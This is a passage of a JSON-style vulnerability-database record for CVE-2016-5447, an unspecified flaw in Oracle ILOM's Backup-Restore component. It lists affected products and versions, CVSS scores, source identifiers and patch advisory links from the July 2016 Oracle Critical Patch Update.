rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.3.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.2", }, { model: "enterprise manager ops center", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.4", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, ], sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, configurations: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", children: { "@container": "@list", }, cpe_match: { "@container": "@list", }, data: { "@container": "@list", }, nodes: { "@container": "@list", }, }, data: [ { CVE_data_version: "4.0", nodes: [ { cpe_match: [ { cpe22Uri: "cpe:/o:oracle:integrated_lights_out_manager_firmware", vulnerable: true, }, ], operator: "OR", }, ], }, ], sources: [ { db: "JVNDB", id: "JVNDB-2016-003875", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, ], trust: 0.6, }, cve: "CVE-2016-5447", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "nvd@nist.gov", availabilityImpact: "PARTIAL", baseScore: 6.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 8, id: "CVE-2016-5447", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.9, vectorString: "AV:N/AC:L/Au:S/C:P/I:P/A:P", version: "2.0", }, { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "SINGLE", author: "VULHUB", availabilityImpact: "PARTIAL", baseScore: 6.5, confidentialityImpact: "PARTIAL", exploitabilityScore: 8, id: "VHN-94266", impactScore: 6.4, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:L/AU:S/C:P/I:P/A:P", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "LOW", baseScore: 7.6, baseSeverity: "HIGH", confidentialityImpact: "HIGH", exploitabilityScore: 2.8, id: "CVE-2016-5447", impactScore: 4.7, integrityImpact: "LOW", privilegesRequired: "LOW", scope: "UNCHANGED", trust: 1.8, userInteraction: "NONE", vectorString: "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", version: "3.0", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2016-5447", trust: 1, value: "HIGH", }, { author: "NVD", id: "CVE-2016-5447", trust: 0.8, value: "High", }, { author: "CNNVD", id: "CNNVD-201607-811", trust: 0.6, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-94266", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2016-5447", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software:\nOracle Application Express\nOracle Database Server\nOracle Access Manager\nOracle BI Publisher\nOracle Business Intelligence Enterprise Edition\nOracle Directory Server Enterprise Edition\nOracle Exalogic Infrastructure\nOracle Fusion Middleware\nOracle GlassFish Server\nOracle HTTP Server\nOracle JDeveloper\nOracle Portal\nOracle WebCenter Sites\nOracle WebLogic Server\nOutside In Technology\nHyperion Financial Reporting\nEnterprise Manager Base Platform\nEnterprise Manager for Fusion Middleware\nEnterprise Manager Ops Center\nOracle E-Business Suite\nOracle Agile Engineering Data Management\nOracle Agile PLM\nOracle Demand Planning\nOracle Engineering Data Management\nOracle Transportation Management\nPeopleSoft Enterprise FSCM\nPeopleSoft Enterprise PeopleTools\nJD Edwards EnterpriseOne Tools\nSiebel Applications\nOracle Fusion Applications\nOracle Communications ASAP\nOracle Communications Core Session Manager\nOracle Communications EAGLE Application Processor\nOracle Communications Messaging Server\nOracle Communications Network Charging and Control\nOracle Communications Operations Monitor\nOracle Communications Policy Management\nOracle Communications Session Border Controller\nOracle Communications Unified Session Manager\nOracle Enterprise Communications Broker\nOracle Banking Platform\nOracle Financial Services Lending and Leasing\nOracle FLEXCUBE Direct Banking\nOracle Health Sciences Clinical Development Center\nOracle Health Sciences Information Manager\nOracle Healthcare Analytics Data Integration\nOracle Healthcare Master Person Index\nOracle Documaker\nOracle Insurance Calculation Engine\nOracle Insurance Policy Administration J2EE\nOracle Insurance Rules Palette\nMICROS Retail XBRi Loss Prevention\nOracle Retail Central\nOracle Back Office\nOracle Returns Management\nOracle Retail Integration Bus\nOracle Retail Order Broker\nOracle Retail Service Backbone\nOracle Retail Store Inventory Management\nOracle Utilities Framework\nOracle Utilities Network Management System\nOracle Utilities Work and Asset Management\nOracle In-Memory Policy Analytics\nOracle Policy Automation\nOracle Policy Automation Connector for Siebel\nOracle Policy Automation for Mobile Devices\nPrimavera Contract Management\nPrimavera P6 Enterprise Project Portfolio Management\nOracle Java SE\nOracle Java SE Embedded\nOracle JRockit\n40G 10G 72/64 Ethernet Switch\nFujitsu M10-1 Servers\nFujitsu M10-4 Servers\nFujitsu M10-4S Servers\nILOM\nOracle Switch ES1-24\nSolaris\nSolaris Cluster\nSPARC Enterprise M3000 Servers\nSPARC Enterprise M4000 Servers\nSPARC Enterprise M5000 Servers\nSPARC Enterprise M8000 Servers\nSPARC Enterprise M9000 Servers\nSun Blade 6000 Ethernet Switched NEM 24P 10GE\nSun Data Center InfiniBand Switch 36\nSun Network 10GE Switch 72p\nSun Network QDR InfiniBand Gateway Switch\nOracle Secure Global Desktop\nOracle VM VirtualBox\nMySQL Server\nExploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. \nThe vulnerability can be exploited over the 'HTTP' protocol. The 'Backup-Restore' sub component is affected. \nThis vulnerability affects the following supported versions:\n3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation", sources: [ { db: "NVD", id: "CVE-2016-5447", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, ], trust: 2.34, }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2016-5447", trust: 2.9, }, { db: "BID", id: "91787", trust: 1.5, }, { db: "BID", id: "91982", trust: 1.5, }, { db: "SECTRACK", id: "1036408", trust: 1.2, }, { db: "JVNDB", id: "JVNDB-2016-003875", trust: 0.8, }, { db: "CNNVD", id: "CNNVD-201607-811", trust: 0.7, }, { db: "VULHUB", id: "VHN-94266", trust: 0.1, }, { db: "VULMON", id: "CVE-2016-5447", trust: 0.1, }, ], sources: [ { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, id: "VAR-201607-0654", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VULHUB", id: "VHN-94266", }, ], trust: 0.01, }, last_update_date: "2024-11-23T20:41:31.505000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "Oracle Critical Patch Update Advisory - July 2016", trust: 0.8, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { title: "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices", trust: 0.8, url: "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html", }, { title: "July 2016 Critical Patch Update Released", trust: 0.8, url: "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update", }, { title: "Oracle Sun Systems Products Suite ILOM Component safety affirmative repair measures", trust: 0.6, url: "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=63171", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=3a04485ebb79f7fbc2472bf9af5ce489", }, ], sources: [ { db: "VULMON", id: "CVE-2016-5447", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "NVD-CWE-noinfo", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2016-5447", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.5, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html", }, { trust: 1.3, url: "http://www.securityfocus.com/bid/91982", }, { trust: 1.2, url: "http://www.securityfocus.com/bid/91787", }, { trust: 1.2, url: "http://www.securitytracker.com/id/1036408", }, { trust: 0.8, url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5447", }, { trust: 0.8, url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-5447", }, { trust: 0.3, url: "http://www.oracle.com", }, { trust: 0.3, url: "http://support.citrix.com/article/ctx216642", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21984819", }, { trust: 0.3, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21988710", }, { trust: 0.3, url: "http://www.oracle.com/index.html", }, { trust: 0.1, url: "https://cwe.mitre.org/data/definitions/.html", }, { trust: 0.1, url: "https://nvd.nist.gov", }, { trust: 0.1, url: "http://tools.cisco.com/security/center/viewalert.x?alertid=47152", }, ], sources: [ { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, sources: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", data: { "@container": "@list", }, }, data: [ { db: "VULHUB", id: "VHN-94266", }, { db: "VULMON", id: "CVE-2016-5447", }, { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, { db: "JVNDB", id: "JVNDB-2016-003875", }, { db: "CNNVD", id: "CNNVD-201607-811", }, { db: "NVD", id: "CVE-2016-5447", }, ], }, sources_release_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", data: { "@container": "@list", }, }, data: [ { date: "2016-07-21T00:00:00", db: "VULHUB", id: "VHN-94266", }, { date: "2016-07-21T00:00:00", db: "VULMON", id: "CVE-2016-5447", }, { date: "2016-07-15T00:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91982", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003875", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-811", }, { date: "2016-07-21T10:15:02.787000", db: "NVD", id: "CVE-2016-5447", }, ], }, sources_update_date: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", data: { "@container": "@list", }, }, data: [ { date: "2017-09-01T00:00:00", db: "VULHUB", id: "VHN-94266", }, { date: "2017-09-01T00:00:00", db: "VULMON", id: "CVE-2016-5447", }, { date: "2018-10-15T09:00:00", db: "BID", id: "91787", }, { date: "2016-07-19T00:00:00", db: "BID", id: "91982", }, { date: "2016-07-26T00:00:00", db: "JVNDB", id: "JVNDB-2016-003875", }, { date: "2016-07-25T00:00:00", db: "CNNVD", id: "CNNVD-201607-811", }, { date: "2024-11-21T02:54:20.040000", db: "NVD", id: "CVE-2016-5447", }, ], }, threat_type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "network", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, ], trust: 0.6, }, title: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Oracle Sun Systems Products Suite of ILOM In Backup-Restore Vulnerabilities", sources: [ { db: "JVNDB", id: "JVNDB-2016-003875", }, ], trust: 0.8, }, type: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Unknown", sources: [ { db: "BID", id: "91787", }, { db: "BID", id: "91982", }, ], trust: 0.6, }, }
var-201604-0434
Vulnerability from variot
